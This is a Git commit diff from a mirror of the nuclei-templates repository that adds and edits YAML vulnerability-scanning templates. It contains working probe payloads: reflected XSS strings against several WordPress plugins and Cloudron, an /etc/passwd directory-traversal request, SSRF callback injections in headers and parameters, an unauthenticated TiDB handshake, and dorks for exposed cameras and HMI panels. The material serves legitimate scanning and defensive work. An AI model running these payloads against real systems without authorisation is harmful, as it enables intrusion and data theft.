daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into fingerprinthub-web-fingerprints

patch-1
sandeep 2021-09-30 04:20:24 +05:30
parent b4dec21231 e9f81943b6
commit 3fd11d500f
30 changed files with 1475 additions and 810 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
README.md
View File

@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags,
| cve2020 | 164 | madrobot | 61 | file | 46 | | | | |
| wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | |
**166 directories, 2125 files**.
**166 directories, 2155 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

1586
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

8
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 731 | pikpikcu | 273 | cves | 731 | info | 645 | http | 1978 |
| lfi | 265 | dhiyaneshdk | 258 | vulnerabilities | 306 | high | 558 | file | 46 |
| panel | 249 | daffainfo | 216 | exposed-panels | 248 | medium | 451 | network | 42 |
| cve | 731 | pikpikcu | 273 | cves | 731 | info | 650 | http | 1983 |
| lfi | 265 | dhiyaneshdk | 263 | vulnerabilities | 307 | high | 558 | file | 46 |
| panel | 252 | daffainfo | 216 | exposed-panels | 250 | medium | 451 | network | 42 |
| xss | 246 | pdteam | 196 | technologies | 192 | critical | 276 | dns | 12 |
| exposure | 233 | geeknik | 153 | exposures | 188 | low | 153 | | |
| wordpress | 229 | dwisiswant0 | 131 | misconfiguration | 136 | | | | |
| rce | 199 | gy741 | 75 | takeovers | 64 | | | | |
| tech | 182 | pussycat0x | 68 | default-logins | 56 | | | | |
| tech | 183 | pussycat0x | 68 | default-logins | 56 | | | | |
| cve2020 | 164 | princechaddha | 61 | file | 46 | | | | |
| wp-plugin | 155 | madrobot | 61 | workflows | 37 | | | | |

0
cves/2018/CVE-2018–9845.yaml → cves/2018/CVE-2018-9845.yaml
View File

5
cves/2021/CVE-2021-22005.yaml
View File

@ -10,6 +10,11 @@ info:
- https://www.vmware.com/security/advisories/VMSA-2021-0020.html
- https://core.vmware.com/vmsa-2021-0020-questions-answers-faq
tags: cve,cve2021,vmware,vcenter
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-22005
cwe-id: CWE-434
requests:
- raw:

33
cves/2021/CVE-2021-24226.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2021-24226
info:
name: AccessAlly < 3.5.7 - $_SERVER Superglobal Leakage
author: dhiyaneshDK
severity: high
description: In the AccessAlly WordPress plugin before 3.5.7, the file \"resource/frontend/product/product-shortcode.php\" responsible for the [accessally_order_form] shortcode is dumping serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, no login or administrator role is required.
reference:
- https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16
- https://nvd.nist.gov/vuln/detail/CVE-2021-24226
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-24226
cwe-id: CWE-200
tags: wordpress,cve,cve2021,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- '<div id="accessally-testing-data"'
condition: and
part: body
- type: status
status:
- 200

37
cves/2021/CVE-2021-24274.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2021-24274
info:
name: Ultimate Maps by Supsystic < 1.2.5 - Reflected Cross-Site scripting (XSS)
author: dhiyaneshDK
severity: medium
description: The Ultimate Maps by Supsystic WordPress plugin before 1.2.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
reference:
- https://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d
- https://nvd.nist.gov/vuln/detail/CVE-2021-24274
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-24274
cwe-id: CWE-79
tags: wordpress,cve,cve2021,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
condition: and
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header

37
cves/2021/CVE-2021-24275.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2021-24275
info:
name: Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS)
author: dhiyaneshDK
severity: medium
description: The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue.
reference:
- https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24275
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-24275
cwe-id: CWE-79
tags: wordpress,cve,cve2021,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
condition: and
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header

37
cves/2021/CVE-2021-24276.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2021-24276
info:
name: Contact Form by Supsystic < 1.7.15 - Reflected Cross-Site scripting (XSS)
author: dhiyaneshDK
severity: medium
description: The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
reference:
- https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c
- https://nvd.nist.gov/vuln/detail/CVE-2021-24276
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-24276
cwe-id: CWE-79
tags: wordpress,cve,cve2021,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header

7
cves/2021/CVE-2021-33544.yaml
View File

@ -4,10 +4,15 @@ info:
name: Geutebruck RCE
description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
author: gy741
severity: critical
severity: high
reference:
- https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
tags: cve,cve2021,geutebruck,rce,oob
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.20
cve-id: CVE-2021-33544
cwe-id: CWE-77
requests:
- raw:

29
cves/2021/CVE-2021-3654.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2021-3654
info:
name: noVNC Open Redirect
author: geeknik
severity: low
description: A user-controlled input redirects noVNC users to an external website.
reference:
- https://seclists.org/oss-sec/2021/q3/188
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654
tags: redirect,novnc,cve,cve2021
requests:
- method: GET
path:
- '{{BaseURL}}//example.com/%2f..'
matchers-condition: and
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header
- type: status
status:
- 302
- 301

4
cves/2021/CVE-2021-38647.yaml
View File

@ -12,6 +12,10 @@ info:
- https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647
- https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/
- https://github.com/microsoft/omi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-38647
requests:
- raw:

37
cves/2021/CVE-2021-39320.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2021-39320
info:
name: underConstruction < 1.19 - Reflected Cross-Site Scripting
author: dhiyaneshDK
severity: medium
description: The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path.
reference:
- https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875
- https://nvd.nist.gov/vuln/detail/CVE-2021-39320
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-39320
cwe-id: CWE-79
tags: wordpress,xss,cve,cve2021,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

32
cves/2021/CVE-2021-40868.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2021-40868
info:
name: Cloudron 6.2 Cross Site Scripting
author: daffainfo
severity: medium
description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS.
reference:
- https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-40868
tags: cve,cve2021,xss,cloudron
requests:
- method: GET
path:
- '{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body

10
dns/azure-takeover-detection.yaml
View File

@ -4,13 +4,8 @@ info:
name: Azure takeover detection
author: pdteam
severity: high
tags: dns,takeover
reference:
- https://godiego.tech/posts/STO/ # kudos to @secfaults for sharing process details.
# Update the list with more CNAMEs related to Azure
# You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover.
# Do not report this without claiming the CNAME.
tags: dns,takeover,azure
reference: https://godiego.co/posts/STO/
dns:
- name: "{{FQDN}}"
@ -40,6 +35,7 @@ dns:
- "search.windows.net"
- "servicebus.windows.net"
- "visualstudio.com"
- type: word
words:
- "NXDOMAIN"

28
exposed-panels/amcrest-login.yaml Normal file
View File

@ -0,0 +1,28 @@
id: amcrest-login
info:
name: Amcrest Login
author: DhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7273
metadata:
shodan-dork: html:"amcrest"
google-dork: intext:"amcrest" "LDAP User"
tags: panel,camera
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- "Amcrest Technologies"
- "LDAPUser"
condition: and
- type: status
status:
- 200

2
exposed-panels/cerebro-panel.yaml
View File

@ -3,7 +3,7 @@ id: cerebro-panel
info:
name: Cerebro Panel
author: huowuzhao,elder tao
severity: high
severity: info
reference: https://github.com/lmenezes/cerebro
tags: panel,cerebro

26
exposed-panels/intelbras-login.yaml Normal file
View File

@ -0,0 +1,26 @@
id: intelbras-login
info:
name: Intelbras Login
author: DhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7272
metadata:
shodan-dork: http.title:"Intelbras"
google-dork: intitle:"Intelbras" "All Rights Reserved" -.com
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}/login.html'
matchers-condition: and
matchers:
- type: word
words:
- "<title>Intelbras</title>"
- type: status
status:
- 200

33
iot/automation-direct.yaml Normal file
View File

@ -0,0 +1,33 @@
id: automation-direct
info:
name: Automation Direct
author: DhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7295
metadata:
shodan-dork: http.title:"C-more -- the best HMI presented by AutomationDirect"
google-dork: intitle:"C-more -- the best HMI presented by AutomationDirect"
tags: panel,iot
requests:
- method: GET
path:
- '{{BaseURL}}/index.html'
matchers-condition: and
matchers:
- type: word
words:
- "<TITLE>C-more -- the best HMI presented by AutomationDirect</TITLE>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<P align="right">([A-Za-z. 0-9]+)<\/P>'

26
iot/netsurveillance-web.yaml Normal file
View File

@ -0,0 +1,26 @@
id: netsurveillance-web
info:
name: NETSurveillance WEB
author: DhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7288
metadata:
shodan-dork: http.title:"NETSurveillance WEB"
google-dork: intitle:"NETSurveillance WEB"
tags: tech,iot
requests:
- method: GET
path:
- '{{BaseURL}}/Login.htm'
matchers-condition: and
matchers:
- type: word
words:
- "<title>NetSurveillance WEB</title>"
- type: status
status:
- 200

28
network/tidb-unauth.yaml Normal file
View File

@ -0,0 +1,28 @@
id: tidb-unauth
info:
name: Unauth TiDB Disclosure
author: lu4nx
severity: high
metadata:
zoomeye-dork: tidb +port:"4000"
tags: network,tidb
network:
- inputs:
- read: 1024 # skip handshake packet
- data: b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c # authentication
type: hex
host:
- "{{Hostname}}"
- "{{Hostname}}:4000"
read-size: 1024
matchers:
- type: binary
binary:
# resp format:
# 07: length, 02: sequence number, 00: success
- "0700000200000002000000"

24
technologies/hp-media-vault-detect.yaml Normal file
View File

@ -0,0 +1,24 @@
id: hp-media-vault-detect
info:
name: HP Media Vault Detect
author: pussycat0x
severity: info
metadata:
fofa-dork: 'app="HP-Media-Vault-Media-Server"'
tags: tech,hp
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- "<title>HP Media Vault"
part: body
- type: status
status:
- 200

10
technologies/default-ibm-http-server.yaml → technologies/ibm-http-server.yaml
View File

@ -1,8 +1,8 @@
id: default-ibm-http-server
id: ibm-http-server
info:
name: Default IBM HTTP Server
author: dhiyaneshDK
author: dhiyaneshDK,pussycat0x
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22IBM-HTTP-Server%22
tags: tech,ibm
@ -21,3 +21,9 @@ requests:
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- "IBM HTTP Server ([0-9.]+)"

33
technologies/tileserver-gl.yaml Normal file
View File

@ -0,0 +1,33 @@
id: tileserver-gl
info:
name: TileServer GL
author: DhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7296
metadata:
shodan-dork: http.title:"TileServer GL - Server for vector and raster maps with GL styles"
google-dork: intitle:"TileServer GL - Server for vector and raster maps with GL styles"
tags: tech
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- "<title>TileServer GL - Server for vector and raster maps with GL styles</title>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'Powered by TileServer GL \(([a-z- 0-9.]+)\)'

58
technologies/vmware-version-detect.yaml Normal file
View File

@ -0,0 +1,58 @@
id: vmware-version-detect
info:
name: vmware-version-detect
author: elouhi
severity: info
description: Sends a POST request containing a SOAP payload to a vCenter server to obtain version information
reference:
- https://www.pwndefend.com/2021/09/23/exposed-vmware-vcenter-servers-around-the-world-cve-2021-22005/
- https://svn.nmap.org/nmap/scripts/vmware-version.nse
tags: tech,vcenter,vmware
requests:
- raw:
- |
POST /sdk/ HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soap:Header>
<operationID>00000001-00000001</operationID>
</soap:Header>
<soap:Body>
<RetrieveServiceContent xmlns="urn:internalvim25">
<_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
</RetrieveServiceContent>
</soap:Body>
</soap:Envelope>
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- ha-folder-root
- type: word
words:
- "text/xml"
part: header
extractors:
- type: regex
part: body
group: 1
regex:
- "<name>(.*?)</name>"
- "<version>(.*?)</version>"

47
vulnerabilities/generic/oob-header-based-interaction.yaml Normal file
View File

@ -0,0 +1,47 @@
id: oob-header-based-interaction
info:
name: Header Based Generic OOB Interaction
author: pdteam
severity: info
description: The remote server fetched a spoofed URL from the request headers.
reference: https://github.com/PortSwigger/collaborator-everywhere
tags: oob,ssrf,generic
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@{{interactsh-url}}
Referer: http://{{interactsh-url}}/ref
Cf-Connecting_ip: spoofed.{{interactsh-url}}
X-Real-Ip: spoofed.{{interactsh-url}}
From: root@{{interactsh-url}}
True-Client-Ip: spoofed.{{interactsh-url}}
Client-Ip: spoofed.{{interactsh-url}}
Forwarded: for=spoofed.{{interactsh-url}};by=spoofed.{{interactsh-url}};host=spoofed.{{interactsh-url}}
X-Client-Ip: spoofed.{{interactsh-url}}
X-Originating-Ip: spoofed.{{interactsh-url}}
X-Wap-Profile: http://{{interactsh-url}}/wap.xml
X-Forwarded-For: spoofed.{{interactsh-url}}
Contact: root@{{interactsh-url}}
X-Forwarded-Host: spoofed.{{interactsh-url}}
X-Host: spoofed.{{interactsh-url}}
X-Forwarded-Server: spoofed.{{interactsh-url}}
X-HTTP-Host-Override: spoofed.{{interactsh-url}}
Cache-Control: no-transform
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"
- type: word
part: interactsh_protocol
name: dns
words:
- "dns"

21
vulnerabilities/generic/oob-param-based-interaction.yaml Normal file
View File

@ -0,0 +1,21 @@
id: oob-param-based-interaction
info:
name: Parameter Based Generic OOB Interaction
author: pdteam
severity: info
description: The remote server fetched a spoofed URL from the request parameters.
reference: https://github.com/PortSwigger/collaborator-everywhere
tags: oob,ssrf,generic
requests:
- method: GET
path:
- "{{BaseURL}}/?u=http://{{interactsh-url}}/&href=http://{{interactsh-url}}/&action=http://{{interactsh-url}}/&host={{interactsh-url}}&http_host={{interactsh-url}}&email=root@{{interactsh-url}}&url=http://{{interactsh-url}}/&load=http://{{interactsh-url}}/&preview=http://{{interactsh-url}}/&target=http://{{interactsh-url}}/&proxy=http://{{interactsh-url}}/&from=http://{{interactsh-url}}/&src=http://{{interactsh-url}}/&ref=http://{{interactsh-url}}/&referrer=http://{{interactsh-url}}/"
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"

56
vulnerabilities/generic/request-based-interaction.yaml Normal file
View File

@ -0,0 +1,56 @@
id: request-based-interaction
info:
name: OOB Request Based Interaction
author: pdteam
severity: info
description: The remote server fetched a spoofed DNS Name from the request.
reference: https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface
tags: oob,ssrf,generic
requests:
- raw:
- |+
GET / HTTP/1.1
Host: {{interactsh-url}}
Cache-Control: no-transform
Accept: */*
- |+
GET / HTTP/1.1
Host: @{{interactsh-url}}
Cache-Control: no-transform
Accept: */*
- |+
GET http://{{interactsh-url}}/ HTTP/1.1
Host: {{Hostname}}
Cache-Control: no-transform
Accept: */*
- |+
GET @{{interactsh-url}}/ HTTP/1.1
Host: {{Hostname}}
Cache-Control: no-transform
Accept: */*
- |+
GET {{interactsh-url}}:80/ HTTP/1.1
Host: {{Hostname}}
Cache-Control: no-transform
Accept: */*
unsafe: true # Use Unsafe HTTP library for malformed HTTP requests.
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"
- type: word
part: interactsh_protocol
name: dns
words:
- "dns"

27
vulnerabilities/wordpress/church-admin-lfi.yaml Normal file
View File

@ -0,0 +1,27 @@
id: church-admin-lfi
info:
name: Church Admin 0.33.2.1 - Unauthenticated Directory Traversal
author: 0x_Akoko
severity: high
description: The "key" parameter of download.php from plugins/church-admin/display/download.php is not sanitized and is vulnerable to a directory traversal type of attack.
reference:
- https://wpscan.com/vulnerability/8997
- https://id.wordpress.org/plugins/church-admin/
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200